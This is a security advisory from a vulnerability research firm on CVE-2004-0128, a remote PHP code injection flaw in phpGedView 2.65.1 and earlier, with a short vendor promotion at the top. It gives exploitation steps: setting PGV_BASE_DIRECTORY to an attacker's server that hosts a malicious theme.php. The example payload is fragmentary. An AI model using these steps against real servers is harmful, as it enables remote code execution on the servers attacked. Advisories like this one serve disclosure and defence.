Best Security Research
|»||netVigilance is an active contributor to nvd.nist.gov
|»||Every vulnerability in our database is independently scored according to CVSS 2.0
|»||Our Scoring is compared to nvd.nist.gov and inconsistencies are reported to the NVD team at NIST
netVigilance is responsible for more than 400 changes to the National Vulnerability Database - more than anyone else.
|»||Our Professional Services team will validate any vulnerability Scoring for you.
Fact: More than 15 vulnerabilities were discovered EVERY day of 2009
PHP remote code injection vulnerability in the GEDCOM configuration script for phpGedView 2.65.1 and earlier allows remote attackers to execute arbitrary PHP code by modifying the PGV_BASE_DIRECTORY parameter to reference a URL on a remote web server that contains a malicious theme.php script.
Mitre CVE: CVE-2004-0128
BUGTRAQ: 20040129 PHP Code Injection Vulnerabilities in phpGedView 2.65.1 and prior
phpGedView is an open source system for online viewing of Gedcom information (family tree and genealogy information). Multiple PHP Code Injection vulnerabilities exist in the phpGedView product. They enable a malicious user to execute commands on the server.
January 29 2004
SecureScout Testcase ID:
TC 17868 (Still in Development)
phpGedView version 2.65.1 and prior
PHP Injection - force the Target to Execute a PHP file from Attackers Server
The Vendor has been notified and has Released a Version 2.65.3 that fixes the problem
(HIGH Risk no authentication needed)
- -- HTTP Request --
- -- HTTP Request --
Code impacted : [GED_File]_conf.php
125: $THEME_DIR = $PGV_BASE_DIRECTORY."themes/standard/";
The require call is only vulnerable when PHP register_globals is On.
In this case you have to obtain the name of the GEDCOM File used. Just perform a http://[target]/session.php request the GEDCOM file will be in argument of the login.php call.
The attacker has to create on his web site a directory call themes/standard, and a file theme.php
For example: theme.php = " ;?>
and the request, will execute the phpinfo() command on the vulnerable target.
Cedric Cochin - netVigilance Vulnerability Research team
back to Security Advisories